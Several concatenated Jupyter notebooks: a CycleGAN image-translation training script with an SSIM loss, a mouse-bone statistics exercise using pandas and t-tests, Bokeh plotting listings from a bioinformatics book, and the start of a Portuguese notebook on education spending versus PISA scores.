for den in dense:
if den in img_name:
break
for c in cam:
if c in img_name:
break
if 'occlu' in img_name:
occ = 'occlu'
else:
occ= ''
#image = io.imread(self.root_dir+'scene' + str(i)+'/'+'scene'+str(i)+den+c+occ+'/'+img_name )
img = self.root_dir+ str(i)+'/'+str(i)+den+c+occ+'/'+img_name+'.jpg'
#optical_flow = self.root_dir_2 + str(i)+'/'+str(i)+den+c+occ+'/'+img_name+'.png'
image = io.imread(img)
image = Image.fromarray(image)
#op_flow = io.imread(optical_flow)
#op_flow = Image.fromarray(op_flow)
origi = image
image = self.transform(image)
#op_flow = self.transform(op_flow)
#dirs2 = os.listdir(self.root_dir_2)
#image_2 = self.root_dir_2+ '/' +dirs2[idx]
image_2 = img
image_2 = Image.open(image_2)
#image_2 = convert_gray2rgb(image_2)
image_2 = image_2.convert("RGB")
#image = convert_gray2rgb(image)
image_2 = self.transform(image_2)
every_thing = {'image': image,
'img_root':img,
'image_2': image_2,
'img_2_name': img_name,
'left_to_right': number_left,
'right_to_left': number_right,
'combined':number_combined,
'all':number_all
}
return every_thing
from torchvision import transforms
train_dataset = GANDataset(csv, dataroot, all_,dataroot,
transform = transforms.Compose([ transforms.Resize([256,256]), transforms.ToTensor(),
transforms.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5])]))
train_loader = torch.utils.data.DataLoader(train_dataset,
batch_size=1, shuffle=True)
```
# Modified Cycle GAN Structure
```
import torch.nn as nn
import torch.nn.functional as F
class ResidualBlock(nn.Module):
def __init__(self, in_features):
super(ResidualBlock, self).__init__()
conv_block = [ nn.ReflectionPad2d(1),
nn.Conv2d(in_features, in_features, 3),
nn.InstanceNorm2d(in_features),
nn.ReLU(inplace=True),
nn.ReflectionPad2d(1),
nn.Conv2d(in_features, in_features, 3),
nn.InstanceNorm2d(in_features) ]
self.conv_block = nn.Sequential(*conv_block)
def forward(self, x):
return x + self.conv_block(x)
class Generator(nn.Module):
def __init__(self, input_nc, output_nc, n_residual_blocks=9):
super(Generator, self).__init__()
# Initial convolution block
model = [ nn.ReflectionPad2d(3),
nn.Conv2d(input_nc, 64, 7),
nn.InstanceNorm2d(64),
nn.ReLU(inplace=True) ]
# Downsampling
in_features = 64
out_features = in_features*2
for _ in range(2):
model += [ nn.Conv2d(in_features, out_features, 3, stride=2, padding=1),
nn.InstanceNorm2d(out_features),
nn.ReLU(inplace=True) ]
in_features = out_features
out_features = in_features*2
# Residual blocks
for _ in range(n_residual_blocks):
model += [ResidualBlock(in_features)]
# Upsampling
out_features = in_features//2
for _ in range(2):
model += [ nn.ConvTranspose2d(in_features, out_features, 3, stride=2, padding=1, output_padding=1),
nn.InstanceNorm2d(out_features),
nn.ReLU(inplace=True) ]
in_features = out_features
out_features = in_features//2
# Output layer
model += [ nn.ReflectionPad2d(3),
nn.Conv2d(64, output_nc, 7),
nn.Tanh() ]
self.model = nn.Sequential(*model)
def forward(self, x):
return self.model(x)
class Discriminator(nn.Module):
def __init__(self, input_nc):
super(Discriminator, self).__init__()
# A bunch of convolutions one after another
model = [ nn.Conv2d(input_nc, 64, 4, stride=2, padding=1),
nn.LeakyReLU(0.2, inplace=True) ]
#model += [ nn.Conv2d(32, 32, 4, stride=2, padding=1),
# nn.InstanceNorm2d(128),
# nn.LeakyReLU(0.2, inplace=True) ]
#model += [ nn.Conv2d(128, 256, 4, stride=2, padding=1),
# nn.InstanceNorm2d(256),
# nn.LeakyReLU(0.2, inplace=True) ]
#model += [ nn.Conv2d(64, 128, 4, padding=1),
# nn.InstanceNorm2d(512),
# nn.LeakyReLU(0.2, inplace=True) ]
# FCN classification layer
model += [nn.Conv2d(64, 1, 4, padding=1)]
self.model = nn.Sequential(*model)
def forward(self, x):
x = self.model(x)
# Average pooling and flatten
return F.avg_pool2d(x, x.size()[2:]).view(x.size()[0], -1)
netG_A2B = Generator(3, 3)
netG_B2A = Generator(3, 3)
netD_A = Discriminator(3)
netD_B = Discriminator(3)
netG_A2B.cuda()
#torch.cuda.empty_cache()
netG_B2A.cuda()
#torch.cuda.empty_cache()
netD_A.cuda()
#torch.cuda.empty_cache()
netD_B.cuda()
#torch.cuda.empty_cache()
```
# Generator and Discriminator Initialization
```
def weights_init_normal(m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
torch.nn.init.normal(m.weight.data, 0.0, 0.02)
elif classname.find('BatchNorm2d') != -1:
torch.nn.init.normal(m.weight.data, 1.0, 0.02)
torch.nn.init.constant(m.bias.data, 0.0)
netG_A2B.apply(weights_init_normal)
netG_B2A.apply(weights_init_normal)
netD_A.apply(weights_init_normal)
netD_B.apply(weights_init_normal)
```
# SSIM
```
import torch
import torch.nn.functional as F
from torch.autograd import Variable
import numpy as np
from math import exp
def gaussian(window_size, sigma):
gauss = torch.Tensor([exp(-(x - window_size//2)**2/float(2*sigma**2)) for x in range(window_size)])
return gauss/gauss.sum()
def create_window(window_size, channel):
_1D_window = gaussian(window_size, 1.5).unsqueeze(1)
_2D_window = _1D_window.mm(_1D_window.t()).float().unsqueeze(0).unsqueeze(0)
window = Variable(_2D_window.expand(channel, 1, window_size, window_size).contiguous())
return window
def _ssim(img1, img2, window, window_size, channel, size_average = True):
mu1 = F.conv2d(img1, window, padding = window_size//2, groups = channel)
mu2 = F.conv2d(img2, window, padding = window_size//2, groups = channel)
mu1_sq = mu1.pow(2)
mu2_sq = mu2.pow(2)
mu1_mu2 = mu1*mu2
sigma1_sq = F.conv2d(img1*img1, window, padding = window_size//2, groups = channel) - mu1_sq
sigma2_sq = F.conv2d(img2*img2, window, padding = window_size//2, groups = channel) - mu2_sq
sigma12 = F.conv2d(img1*img2, window, padding = window_size//2, groups = channel) - mu1_mu2
C1 = 0.01**2
C2 = 0.03**2
ssim_map = ((2*mu1_mu2 + C1)*(2*sigma12 + C2))/((mu1_sq + mu2_sq + C1)*(sigma1_sq + sigma2_sq + C2))
if size_average:
return ssim_map.mean()
else:
return ssim_map.mean(1).mean(1).mean(1)
class SSIM(torch.nn.Module):
def __init__(self, window_size = 11, size_average = True):
super(SSIM, self).__init__()
self.window_size = window_size
self.size_average = size_average
self.channel = 1
self.window = create_window(window_size, self.channel)
def forward(self, img1, img2):
(_, channel, _, _) = img1.size()
if channel == self.channel and self.window.data.type() == img1.data.type():
window = self.window
else:
window = create_window(self.window_size, channel)
if img1.is_cuda:
window = window.cuda(img1.get_device())
window = window.type_as(img1)
self.window = window
self.channel = channel
return _ssim(img1, img2, window, self.window_size, channel, self.size_average)
def ssim(img1, img2, window_size = 11, size_average = True):
(_, channel, _, _) = img1.size()
window = create_window(window_size, channel)
if img1.is_cuda:
window = window.cuda(img1.get_device())
window = window.type_as(img1)
return _ssim(img1, img2, window, window_size, channel, size_average)
```
# Losses for Cycle GAN
```
criterion_GAN = torch.nn.MSELoss()
criterion_cycle = torch.nn.L1Loss()
criterion_identity = torch.nn.L1Loss()
```
# Optimizer for Cycle GAN Training
```
import itertools
optimizer_G = torch.optim.Adam(itertools.chain(netG_A2B.parameters(), netG_B2A.parameters()),
lr= .0002, betas=(0.5, 0.999))
optimizer_D_A = torch.optim.Adam(netD_A.parameters(), lr= .0002, betas=(0.5, 0.999))
optimizer_D_B = torch.optim.Adam(netD_B.parameters(), lr= .0002, betas=(0.5, 0.999))
```
# Learning Rate Schedular for Cycle GAN training
```
from torch.optim import lr_scheduler
class LambdaLR():
def __init__(self, n_epochs, offset, decay_start_epoch):
assert ((n_epochs - decay_start_epoch) > 0), "Decay must start before the training session ends!"
self.n_epochs = n_epochs
self.offset = offset
self.decay_start_epoch = decay_start_epoch
def step(self, epoch):
return 1.0 - max(0, epoch + self.offset - self.decay_start_epoch)/(self.n_epochs - self.decay_start_epoch)
lr_scheduler_G = torch.optim.lr_scheduler.LambdaLR(optimizer_G, lr_lambda=LambdaLR(50, 0, 25).step)
lr_scheduler_D_A = torch.optim.lr_scheduler.LambdaLR(optimizer_D_A, lr_lambda = LambdaLR(50, 0 ,25).step)
lr_scheduler_D_B = torch.optim.lr_scheduler.LambdaLR(optimizer_D_B, lr_lambda=LambdaLR(50, 0, 25).step)
```
# Replay Buffer to Hold the Previous outputs from Generator During Training
```
from torch.autograd import Variable
import random
class ReplayBuffer():
def __init__(self, max_size=50):
assert (max_size > 0), 'Empty buffer or trying to create a black hole. Be careful.'
self.max_size = max_size
self.data = []
def push_and_pop(self, data):
to_return = []
for element in data.data:
element = torch.unsqueeze(element, 0)
if len(self.data) < self.max_size:
self.data.append(element)
to_return.append(element)
else:
if random.uniform(0,1) > 0.5:
i = random.randint(0, self.max_size-1)
to_return.append(self.data[i].clone())
self.data[i] = element
else:
to_return.append(element)
return Variable(torch.cat(to_return))
fake_A_buffer = ReplayBuffer()
fake_B_buffer = ReplayBuffer()
```
# Training of Cycle GAN
```
epochs = 50
for epoch in range(epochs):
for i, data in enumerate(train_loader):
real_A = Variable(data['image'].cuda())
real_B = Variable(data['image_2'].cuda())
target_real = Variable(torch.tensor(len(data['image'])).fill_(1.0).float(), requires_grad=False).cuda()
target_fake = Variable(torch.tensor(len(data['image'])).fill_(0.0).float(), requires_grad=False).cuda()
#real_A = Variable(data['image'])
#real_B = Variable(data['image_2'])
#target_real = Variable(torch.tensor(len(data['image'])).fill_(1.0).float(), requires_grad=False)
#target_fake = Variable(torch.tensor(len(data['image'])).fill_(0.0).float(), requires_grad=False)
###### Generators A2B and B2A ######
optimizer_G.zero_grad()
# Identity loss
# G_A2B(B) should equal B if real B is fed
same_B = netG_A2B(real_B)
loss_identity_B = criterion_identity(same_B, real_B)* 5.0
# G_B2A(A) should equal A if real A is fed
same_A = netG_B2A(real_A)
loss_identity_A = criterion_identity(same_A, real_A)* 5.0
# GAN loss
fake_B = netG_A2B(real_A)
pred_fake = netD_B(fake_B)
loss_GAN_A2B = criterion_GAN(pred_fake, target_real)
fake_A = netG_B2A(real_B)
pred_fake = netD_A(fake_A)
loss_GAN_B2A = criterion_GAN(pred_fake, target_real)
# Cycle loss
recovered_A = netG_B2A(fake_B)
loss_cycle_ABA = (criterion_cycle(recovered_A, real_A)* 10.0)
#seamese loss for 1st image
#siamese_1.load_state_dict(torch.load('/home/abhijit/Documents/saved_models/Siamese_game.pth'))
with torch.no_grad():
# x1, x2 = siamese_1(real_A,fake_B)
SSIM_B2A = 1 -ssim_loss(real_A,recovered_A).detach()
#label = 0
#if SSIM_B2A > .1:
# label = 0
#else:
# label = 1
#same_loss_1 = 2* loss(x1, x2,1 )
#p = same_loss_1
#simease end for 1st image
recovered_B = netG_A2B(fake_A)
loss_cycle_BAB = (criterion_cycle(recovered_B, real_B)* 10.0)
#siamese_2.load_state_dict(torch.load('/home/abhijit/Documents/saved_models/Siamese_real.pth'))
#2nd siamese loss
with torch.no_grad():
# x1, x2 = siamese_2(real_B,fake_A)
SSIM_A2B = 1 -ssim_loss(real_B, recovered_B).detach()
#if SSIM_A2B > .1:
# label = 0
#else:
# label = 1
#same_loss_2 = 2* loss_2(x1, x2,1 )
# q = same_loss_2
#SSIM Loss
#fake_B = netG_A2B(real_A)
#pred_fake = netD_B(fake_B)
#SSIM_B2A = -ssim_loss(fake_B, real_A)
#fake_A = netG_B2A(real_B)
#pred_fake = netD_A(fake_A)
#SSIM_A2B = -ssim_loss(fake_A, real_B)
# Total loss
loss_G = (loss_identity_A + loss_identity_B + loss_GAN_A2B +
loss_GAN_B2A + loss_cycle_ABA + loss_cycle_BAB + SSIM_B2A + SSIM_A2B)
#loss_G = ( loss_GAN_A2B +
# loss_identity_A + loss_identity_B+
# loss_GAN_B2A + loss_cycle_ABA + loss_cycle_BAB)
#same_loss_1 + same_loss_2)
loss_G = loss_G.float()
#print(loss_G)
loss_G.backward()
optimizer_G.step()
# with torch.no_grad():
#1st siamese network
#optimizer_1.zero_grad()
#x1, x2 = siamese_1(recovered_A.detach(), real_A)
#SSIM_B2A = 1 -ssim_loss(recovered_A, real_A).detach()
#label = 0
#if SSIM_B2A > .1:
# label = 0
#else:
# label = 1
#same_loss_1 = 1* loss_1(x1, x2,label )
#same_loss = loss(x1, x2,label )
#same_loss_1.backward()
#optimizer_1.step()
# with torch.no_grad():
#2nd siamese network
#optimizer_2.zero_grad()
#x1, x2 = siamese_2(recovered_B.detach(), real_B)
#SSIM_A2B = 1 -ssim_loss(recovered_B, real_B).detach()
#if SSIM_A2B > .1:
# label = 0
# else:
#label = 1
# same_loss_2 = 1* loss_2(x1, x2,label )
#same_loss = loss(x1, x2,label )
#same_loss_2.backward()
# optimizer_2.step()
optimizer_D_A.zero_grad()
# Real loss
pred_real = netD_A(real_A)
loss_D_real = criterion_GAN(pred_real, target_real)
# Fake loss
fake_A = fake_A_buffer.push_and_pop(fake_A)
pred_fake = netD_A(fake_A.detach())
loss_D_fake = criterion_GAN(pred_fake, target_fake)
# Total loss
loss_D_A = ((loss_D_real + loss_D_fake)*0.5)
loss_D_A.backward()
optimizer_D_A.step()
###################################
###### Discriminator B ######
optimizer_D_B.zero_grad()
pred_real = netD_B(real_B)
loss_D_real = criterion_GAN(pred_real, target_real)
# Fake loss
fake_B = fake_B_buffer.push_and_pop(fake_B)
pred_fake = netD_B(fake_B.detach())
loss_D_fake = criterion_GAN(pred_fake, target_fake)
# Total loss
loss_D_B = (loss_D_real + loss_D_fake)*0.5
loss_D_B.backward()
optimizer_D_B.step()
#siamese update
if ( epoch % 1)==0 and (i%400)== 0:
print("epoch: %d loss_D_A: %f loss_D_B: %f loss_G: %f ,SSIM_1 :%f SSIM_2: %f \n"
%(epoch, loss_D_A, loss_D_B, loss_G, SSIM_B2A,SSIM_A2B) )
print(epoch)
from matplotlib.pyplot import figure
figure(num=1, figsize=(6, 6))
print('from game image \n')
image = fake_B[0].cpu()
image = (image* .5 + .5)
#plt.imshow(image)
plt.imshow(image.permute(1, 2, 0) )
plt.show()
print('from real image')
figure(num=1, figsize=(6, 6))
image_2 = fake_A[0].cpu()
#plt.imshow(image)
image_2 = (image_2 *.5 + 0.5 )
plt.imshow(image_2.permute(1, 2, 0) )
plt.show()
lr_scheduler_G.step()
lr_scheduler_D_A.step()
lr_scheduler_D_B.step()
#scheduler_1.step()
#scheduler_2.step()
```
# Translating Synthetic Image to Real Image
```
epochs = 1
for epoch in range(epochs):
for i, data in enumerate(train_loader):
real_A = Variable(data['image'].cuda())
real_B = Variable(data['image_2'].cuda())
x1, x2 = siamese_1(real_A,netG_A2B(real_A))
test_1 = loss(x1, x2, 1)
ssim = 1 - ssim_loss(real_A, (netG_A2B(real_A)))
print("test_1 : %f, ssim : %f"%(test_1, ssim))
fake_B = 0.5*(netG_A2B(real_A).data + 1.0)
fake_A = 0.5*(netG_B2A(real_B).data + 1.0)
# Save image files
from matplotlib.pyplot import figure
figure(num=3,figsize = (8,8))
#plt.imshow(((data['image'][0].cpu()).permute(1, 2, 0)+1)*.5)
#plt.imsave( '/home/abhijit/Documents/game_output/'+str(i)+ 'a.png', ((data['image'][0].cpu()).permute(1, 2, 0)+1)*.5 )
from matplotlib.pyplot import figure
figure(num=1, figsize=(8, 8))
#plt.imshow((fake_B[0].cpu()).permute(1, 2, 0))
plt.imsave( '/home/abhijit/Documents/finalgamee/cycleandssim/'+data['img_2_name'][0]+ '.png' ,(fake_B[0].cpu()).permute(1, 2, 0))
figure(num=2, figsize=(8, 8))
#plt.imshow((fake_A[0].cpu()).permute(1, 2, 0))
#plt.imsave( '/home/abhijit/Documents/boleizhou_output/siamese_identity/'+data['img_2_name'][0]+'.png' ,(fake_A[0].cpu()).permute(1, 2, 0))
figure(num=4, figsize = (8,8))
#plt.imshow(((data['image_2'][0].cpu()).permute(1, 2, 0)+1)*.5)
#plt.imsave( '/home/abhijit/Documents/output2/from real/'+str(i) +'a.png', ((data['image_2'][0].cpu()).permute(1, 2, 0)+1)*.5)
if ( epoch % 5)==0 and (i%400)== 0:
from matplotlib.pyplot import figure
figure(num=1, figsize=(10, 10))
print('from game image \n')
image = netG_B2A(fake_B).detach()
image = image[0].cpu()
image = (image* .5+.5)
#plt.imshow(image)
plt.imshow(image.permute(1, 2, 0) )
plt.show()
#print('from real image')
#figure(num=1, figsize=(10, 10))
#image_2 = fake_A[0].cpu()
#plt.imshow(image)
#image_2 = (image_2 *.5 +.5 )
#plt.imshow(image_2.permute(1, 2, 0) )
#plt.show()
```
| github_jupyter |
# Exercise 10 - Data frames and Statistics
```
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import skimage.io as io
```
# 1. Running a basic statistical analysis
## 1.1. Introduction
There are 1000 mouse femur bones which have been measured at high resolution and a number of shape analyses run on each sample. - Phenotypical Information - Each column represents a metric which was assessed in the images - CORT_DTO__C_TH for example is the mean thickness of the cortical bone.
# 1.2 Data preparation
## 1.2.1. Load data into frames
For this example we will start with a fairly complicated dataset from a genetics analysis done at the Institute of Biomechanics, ETHZ.
```
pheno = pd.read_csv('phenoTable.csv')
pheno.head()
```
Genetic Information (genoTable.csv)
Each animal has been tagged at a number of different regions of the genome (called markers: D1Mit236)
- At each marker there are 3 (actually 4) possibilities
- A is homozygous (the same from both parents) from the A strain
- B is homozygous from the B strain
- H is heterozygous (one from A, one from B)
- ‘-’ is missing or erronous measurements
```
geno = pd.read_csv('genoTable.csv')
geno.head(5)
```
## 1.2.2. [Merge data frames](https://pandas.pydata.org/pandas-docs/stable/user_guide/merging.html)
We want to merge the data set using the key 'ID'
```
df = pd.merge(pheno,geno, on='ID')
df.head()
```
## 1.2.3. Rename a column
The key 'FEMALE' is a boolean, we want to change the key name to 'GENDER' and the contents from true/false to 'F'/'M'. Here, a [lambda function](https://realpython.com/python-lambda/) is used for the mapping when we apply an operation to each row in the GENDER column.
```
df=df.rename(columns={"FEMALE": "GENDER"})
df['GENDER'] = df['GENDER'].apply(lambda x: 'F' if x else 'M')
df['GENDER'].sample(5)
```
## 1.3. Tasks
### 1.3.1 First inspection
1. Look at the histograms of the available variables in the phenotype data.
```
fig,ax=plt.subplots(1,1,figsize=(15,15));
pheno.hist(ax=ax,bins=50);
```
These are far too many variables to work with. At least for a start. We have to focus on some few e.g.
- Bone mineral density (BMD)
- Cortical bone thickness (CORT_DTO_TH)
- Cortical bone Microstructural thickness (CORT_DTO_TH_SD)
### 1.3.2 Look at the pair plot
Explore the data and correlations between various metrics by using the ‘pairplot’ plotting component. Examine different variable combinations.
```
sns.pairplot(pheno, vars = ['BMD', 'CORT_DTO__C_TH', 'CORT_DTO__C_TH_SD']);
```
3. For the rest of the analysis you can connect the various components to the ‘Column Filter’ node since that is the last step in the processing
4. Use one of the T-Test to see if there is a statistically significant difference between Gender’s when examining Cortical Bone Microstructural Thickness (Mean) ```CORT_DTO__C_TH```
- Which value is the p-value?
- What does the p-value mean, is it significant, by what criterion?
```
from scipy.stats import ttest_ind
# Extract the CORT_DTO__C_TH column and create a data frame for FEMALE and MALE respectively using the GENDER column
male = df[insert your gender filters][select column to compare]
female = df[insert your gender filters][select column to compare]
ttest,pval = ttest_ind(female,male)
print("p-value={:0.4f}".format(pval))
```
5. Use another node from the Hypothesis Testing section to evaluate the effect on the D16Mit5 on the Lacuna Distribution Anisotropy? Is it significant?
```
# Insert your test code here
```
## 1.3.3 Questions
1. In the ‘Independent Groups T-Test’ node we can run a t-test against all of the columns at the same time, why SHOULDN’T we do this?
2. If we do, how do we need to interpret this in the results
3. Is p<0.05 a sufficient signifance criteria?
## 2. Comparing two real bone samples
For this example we will compare two real cortical bone samples taken from mice.
For the purpose of the analysis and keeping the data sizes small, we will use Anders' Crazy Camera for simulating the noisy detection process.
The assignment aims to be more integrative and you will combine a number of different lectures to get to the final answer.
### Preparing the data
```
imgA = (0.0 < io.imread('bone_7H3A_B1.tif')).astype(float)
imgB = (0.0 < io.imread('bone_7H6A_B2.tif')).astype(float)
plt.hist([imgA.ravel(), imgB.ravel()],bins=2);
```
This is the code to simulate a bad camera that produces bad images
```
import numpy as numpy
import skimage.filters as filters
def camera(img,blurr=1.0,noise=0.1,illum=0.0) :
res = filters.gaussian(img,sigma=blurr)
res = res + np.random.normal(size=res.shape,loc=0,scale=noise)
return res
def crappyCamera(img) :
return camera(img,blurr=2.0,noise=0.2, illum=0.0)
cimgA=crappyCamera(imgA)
cimgB=crappyCamera(imgB)
fig, (ax1,ax2) = plt.subplots(1,2,figsize=(12,7))
ax1.imshow(cimgA[100])
ax2.imshow(cimgB[100])
```
### 2.1 Questions
1. We want to know if there is a statistically significant difference in
- cell volume
- cell shape
- cell density
between the two samples given the variation in the detector
1. which metric do we need here?
2. why?
2. We see in the volume comparison a very skewed representation of the data Volume/Num Pixels
- why is this? (Hint check the segmented images)
- What might be done to alleviate it (hint Row Filter)
### 2.2 Hints
1. Look at the kind of noise (you can peek inside the Crappy Camera) to choose the proper filter
2. Use an automated thresholding technique for finding the bone automatic-methods
3. To do this we will need to enhance the image, segment out the bone (dense) tissue, find the mask so that we can look at the cells.
4. We then need to label the cells, and analyze their volume and shape: labeling
5. Use Morphology and strongly filter parameters it might be possible to maximize the differences in the groups
6. Create a data frame with columns for sample_id, item_id and metric. Look for ideas in the previous exercises and lectures.
## 3. T-Test Simulator
This exercise (workflow named - Statistical Significance Hunter) shows the same results as we discussed in the lecture for finding p-values of significance.
It takes a completely random stream of numbers with a mean 0.0 and tests them against a null hypothesis (that they equal 0) in small batches, you can adjust the size of the batches, the number of items and the confidence interval. The result is a pie chart showing the number of “significant” results found using the standard scientific criteria for common studies.
### T-test for single value $\mathcal{H}_0$
```
from scipy.stats import ttest_1samp
data= np.random.normal(size=(100,3),loc=0,scale=1.0)
tset, pval = ttest_1samp(data, 0.0) # Test if data has average = 0
print("p-values",pval)
reject = pval < 0.05
print("Reject : ", reject)
for idx,r in enumerate(reject) :
if r : # alpha value is 0.05 or 5%
print("[x] we are rejecting null hypothesis")
else:
print("[v] we are accepting null hypothesis")
def statSignificanceHunter(batches=10,samples=10) :
testLevels=[0.05,0.01]
data= np.random.normal(size=(samples,batches),loc=0,scale=1.0)
tset, pval = ttest_1samp(data, 0.0)
counts=[np.sum(testLevels[0]<=pval),np.sum(pval<testLevels[0])-np.sum(pval<testLevels[1]),np.sum(pval<testLevels[1])]
return pval, counts
pvals, counts = statSignificanceHunter(batches=100,samples=100)
plt.figure(figsize=(12,8))
plt.pie(counts,labels=['Accepted','0.05 Reject','0.01 Reject']); plt.legend();
```
### 3.1 Task
A single run is not sufficient to make a conclusion we need to repeat
Write a program that tests the random data with different batch sizes. You need:
1. Loops over batch size and number of samples (in case you want to test different sizes)
2. A loop that repeats the loops to get some statistics
3. Store the data in a data frame
```
# Your code here
```
### 3.2 Questions
1. If we change the size of the chunks to the same as the number of elements in the list do we still expect to find ‘significant’ (<0.05) values? Why or why not?
2. How does comparing against the null hypothesis being 0 relate to comparing two groups?
3. How does comparing a single column compare to looking at different metrics for the same samples?
4. What is bonferroni correction (hint: wikipedia) and how could it be applied to this simulation?
Make the modification needed
## 4 Grammar of Graphics Plots
This is a walk through demonstration using ggplot instead of matplotlib for plotting data.
### 4.1 Introduction
Making plots or graphics should be divided into separate independent components.
- Setup is the ggplot command and the data
- Mapping is in the aes command ```ggplot(input data frame,aes(x=name of x column,y=name of y column))+```
- Plot is the next command (geom_point, geom_smooth, geom_density, geom_histogram, geom_contour) ```geom_point()+```
- Coordinates can then be added to any type of plot (coord_equal, coord_polar, etc)
- Scales can also be added (scale_x_log10, scale_y_sqrt, scale_color_gradientn)
- Labels are added labs(x="x label",y="y label",title="title")
### 4.2 Tasks
1. Load the necessary libraries
```
from plotnine import *
from plotnine.data import *
```
2. Load the phenoTable from the first exercise
```
pheno = pd.read_csv('phenoTable.csv')
pheno2 = pheno[['ID','BMD','MECHANICS_STIFFNESS','CORT_DTO__C_TH','CORT_DTO__C_TH_SD']]
pheno2.head()
```
- Setup the input table as ```pheno``` and the map ping with the x position mapped to BMD (Bone Mineral Density) and the y position as CT_TH_RAD (Cortical Bone Thickness)
- Create the first simple plot by adding a point representation to the plot
```
ggplot(pheno,aes(x="BMD",y="CT_TH_RAD")) \
+ geom_point()
```
- Change color of the points to show if the animal is female or not (in the mapping)
```
ggplot(pheno,aes(x="BMD",y="CT_TH_RAD",color="FEMALE"))+geom_point()
```
- Show the color as a discrete (factor) value instead of a number
- First we need some data frame manipulation to change the boolean 0/1 into labels.
```
m=pheno
m=m.rename(columns={"FEMALE": "GENDER"})
m['GENDER'] = m['GENDER'].apply(lambda x: 'F' if x else 'M')
ggplot(m,aes(x="BMD",y="CT_TH_RAD",color="GENDER"))+geom_point()
```
- Make the plot in two facets (windows) instead of the same one
```
ggplot(m,aes(x="BMD",y="CT_TH_RAD",color="GENDER")) \
+ geom_point() \
+ facet_wrap("GENDER")
```
For more information and tutorial read about it in: http://ggplot2.org/
## Task: Finalize the figures with decorations
The previous plots are not publication ready, explore the different plot grammar components to add decorations
- Plot is the next command (geom_point, geom_smooth, geom_density, geom_histogram, geom_contour) geom_point()+
- Coordinates can then be added to any type of plot (coord_equal, coord_polar, etc)
- Scales can also be added (scale_x_log10, scale_y_sqrt, scale_color_gradientn)
- Labels are added labs(x="x label",y="y label",title="title")
| github_jupyter |
Python for Bioinformatics
-----------------------------

This Jupyter notebook is intented to be used alongside the book [Python for Bioinformatics](http://py3.us/)
**Note:** Before opening the file, this file should be accesible from this Jupyter notebook. In order to do so, the following commands will download these files from Github and extract them into a directory called samples.
Chapter 14: Graphics in Python
-----------------------------
**USING BOKEH**
```
!curl https://raw.githubusercontent.com/Serulab/Py4Bio/master/samples/samples.tar.bz2 -o samples.tar.bz2
!mkdir samples
!tar xvfj samples.tar.bz2 -C samples
```
**Listing 14.1:** basiccircle.py: A circle made with Bokeh
```
from bokeh.plotting import figure, output_file, show
p = figure(width=400, height=400)
p.circle(2, 3, radius=.5, alpha=0.5)
output_file("out.html")
show(p)
```
**Listing 14.2:** fourcircles.py: 4 circles made with Bokeh
```
from bokeh.plotting import figure, output_file, show
p = figure(width=500, height=500)
x = [1, 1, 2, 2]
y = [1, 2, 1, 2]
p.circle(x, y, radius=.35, alpha=0.5, color='red')
output_file("out.html")
show(p)
```
**Listing 14.3:** plot1.py: A minimal plot
```
from bokeh.plotting import figure, output_file, show
x = [1, 2, 3, 4, 5, 6, 7, 8]
y = [.7, 1.4, 2.1, 3, 3.85, 4.55, 5.8, 6.45]
p = figure(title='Mean wt increased vs. time',
x_axis_label='Time in days',
y_axis_label='% Mean WT increased')
p.circle(x, y, legend='Subject 1', size=10)
output_file('test.html')
show(p)
```
**Listing 14.4:** plot2.py: Two data series plot
```
from bokeh.plotting import figure, output_file, show
x = [1, 2, 3, 4, 5, 6, 7, 8]
y = [.7, 1.4, 2.1, 3, 3.85, 4.55, 5.8, 6.45]
z = [.5, 1.1, 1.9, 2.5, 3.1, 3.9, 4.85, 5.2]
p = figure(title='Mean wt increased vs. time',
x_axis_label='Time in days',
y_axis_label='% Mean WT increased')
p.circle(x, y, legend='Subject 1', size=10)
p.circle(x, z, legend='Subject 2', size=10, line_color='red',
fill_color='white')
p.legend.location = 'top_left'
output_file('test.html')
show(p)
```
**Listing 14.5:** fishpc.py: Scatter plot
```
from bokeh.charts import Scatter, output_file, show
from pandas import DataFrame
df = DataFrame.from_csv('samples/fishdata.csv')
scatter = Scatter(df, x='PC1', y='PC2', color='feeds',
marker='species', title=
'Metabolic variations based on 1H NMR profiling of fishes',
xlabel='Principal Component 1: 35.8%',
ylabel='Principal Component 2: 15.1%')
scatter.legend.background_fill_alpha = 0.3
output_file('scatter.html')
show(scatter)
```
**Listing 14.6:** heatmap.py: Plot a gene expression file
```
from bokeh.charts import HeatMap, bins, output_file, show
import pandas as pd
DATA_FILE = 'samples/GSM188012.CEL'
dtype = {'x': int, 'y': int, 'lux': float}
dataset = pd.read_csv(DATA_FILE, sep='\t', dtype=dtype)
hm = HeatMap(dataset, x=bins('x'), y=bins('y'), values='lux',
title='Expression', stat='mean')
output_file("heatmap7.html", title="heatmap.py example")
show(hm)
```
**Listing 14.7:** chord.py: A Chord diagram
```
from bokeh.charts import output_file, Chord
from bokeh.io import show
import pandas as pd
data = pd.read_csv('samples/test3.csv')
chord_from_df = Chord(data, source='name_x', target='name_y',
value='value')
output_file('chord.html')
show(chord_from_df)
```
| github_jupyter |
---
<h1><center><font color='#82ad32'>Gasto Público em Educação x Desempenho no PISA</font></center></h1>
---
Link para a apresentação [aqui](https://drive.google.com/file/d/1Yio6a-DK5tmZ_Wa7uIHvt-6I2OKgyPlr/view?usp=sharing)
O objetivo deste trabalho é avaliar possíveis correlações entre o gasto público de um país em educação e o desempenho dos alunos deste país na prova do Programa Internacional de Avaliação de Estudantes (PISA). Todas as informações necessárias foram baixadas no site de dados da OCDE [aqui](https://data.oecd.org/), onde é possível encontrar o histórico dos indicadores pertinentes em formato ```.csv```.
Vale notar que por gasto público em educação nos referimos à porcentagem do PIB investida pelo país na educação primária e secundária. O desempenho do país no PISA, por sua vez, faz referência à nota de cada país na prova e está dividido em três bases, uma para cada área do conhecimento avaliada: Leitura, Matemática e Ciência. Maiores informações a respeito do PISA podem ser encontradas [aqui](http://portal.inep.gov.br/pisa), no site do INEP.
### <font color='#82ad32'>Divisão do Trabalho</font>
0. Importação das Bibliotecas e Estilização Visual
1. Input das Bases
2. Tratamento das Bases
3. Unificação das Bases
4. Análise Exploratória dos Dados
5. Correlação entre Gasto Público em Educação x Desempenho no PISA
---
## <font color='#82ad32'>0. Importação das Bibliotecas e Estilização Visual
```
import numpy as np
import pandas as pd
import seaborn as sns
import plotly.express as px
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
#Estilização Visual
plt.rcParams['font.family'] = 'monospace'
plt.rc("axes.spines", top=False, right=False, left=False)
grey = '#363636'
plt.rcParams['axes.linewidth'] = 0.3
